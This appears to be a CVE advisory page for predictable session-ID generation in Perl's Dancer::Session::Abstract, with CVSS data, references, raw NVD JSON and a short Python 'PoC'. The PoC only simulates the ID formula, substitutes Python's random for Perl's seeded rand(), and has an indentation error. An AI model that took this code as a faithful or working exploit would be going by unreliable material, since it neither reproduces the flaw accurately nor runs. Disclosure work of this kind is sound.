CVE-2026-5080

Description

Dancer::Session::Abstract versions through 1.3522 for Perl generates session ids insecurely. The session id is generated from summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times. The path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations. The epoch time can be guessed by an attacker, and may be leaked in the HTTP header. The process id comes from a small set of numbers, and workers may have sequential process ids. The built-in rand() function is seeded with 32-bits and is considered unsuitable for security applications. Predictable session ids could allow an attacker to gain access to systems.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:perldancer:dancer\:\:session\:\:abstract:*:*:*:*:*:perl:*:* - VULNERABLE

Dancer::Session::Abstract <= 1.3522

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC: Simulating the vulnerable session ID generation logic in Python
# This script demonstrates how predictable the session ID generation is.

import random
import time

def generate_vulnerable_sid(path, pid, epoch_time):
    # Sum of character codepoints of the absolute pathname
    path_sum = sum(ord(c) for c in path)
    
    # Insecure rand() call (0 to 999-billion)
    # Note: Actual vulnerability uses Perl's rand() with 32-bit seed
    random_val = random.randint(0, 999_000_000_000)
    
    # Calculate the seed number
    seed = path_sum + pid + epoch_time + random_val
    
    # Concatenate the result three times
    return f"{seed}{seed}{seed}"

# Scenario: Attacker knows the target path and approx time
print("[+] CVE-2026-5080 Session ID Prediction PoC")

# Common installation path for Perl apps
target_path = "/var/www/html/MyDancerApp"

# PIDs are often sequential and in a small range (e.g., worker processes)
 guessed_pids = [1200, 1201, 1202]

# Attacker captures the request time from HTTP 'Date' header
request_time = int(time.time())

print(f"[*] Target Path: {target_path}")
print(f"[*] Request Time (Epoch): {request_time}")
print(f"[*] Guessing PIDs: {guessed_pids}")
print("[*] Generating possible Session IDs:")

for pid in guessed_pids:
    # Since rand() is weak, we can try a few random values or just the logic
    # For demonstration, we generate one ID per PID with a random factor
    sid = generate_vulnerable_sid(target_path, pid, request_time)
    print(f"    PID {pid}: {sid}")

print("[!] An attacker could brute force the 'rand' part due to 32-bit seed space.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5080
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5080
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5080/
[4] VulDB https://vuldb.com/cve/CVE-2026-5080
[5] https://metacpan.org/release/BIGPRESH/Dancer-1.3522/source/lib/Dancer/Session/Abstract.pm#L85-102
[6] https://security.metacpan.org/patches/D/Dancer/1.3522/CVE-2026-5080-r1.patch
[7] http://www.openwall.com/lists/oss-security/2026/04/30/19

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5080", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-30T12:16:24.333", "lastModified": "2026-05-05T02:54:42.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dancer::Session::Abstract versions through 1.3522 for Perl generates session ids insecurely.\n\nThe session id is generated from summing the character codepoints of the absolute pathname with the process id, the epoch time and calls to the built-in rand() function to return a number between 0 and 999-billion, and concatenating that result three times.\n\nThe path name might be known or guessed by an attacker, especially for applications known to be written using Dancer with standard installation locations.\n\nThe epoch time can be guessed by an attacker, and may be leaked in the HTTP header.\n\nThe process id comes from a small set of numbers, and workers may have sequential process ids.\n\nThe built-in rand() function is seeded with 32-bits and is considered unsuitable for security applications.\n\nPredictable session ids could allow an attacker to gain access to systems."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:perldancer:dancer\\:\\:session\\:\\:abstract:*:*:*:*:*:perl:*:*", "versionEndIncluding": "1.3522", "matchCriteriaId": "D47CD43F-7C33-4D6F-BEFB-C820BB2D6777"}]}]}], "references": [{"url": "https://metacpan.org/release/BIGPRESH/Dancer-1.3522/source/lib/Dancer/Session/Abstract.pm#L85-102", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://security.metacpan.org/patches/D/Dancer/1.3522/CVE-2026-5080-r1.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/30/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}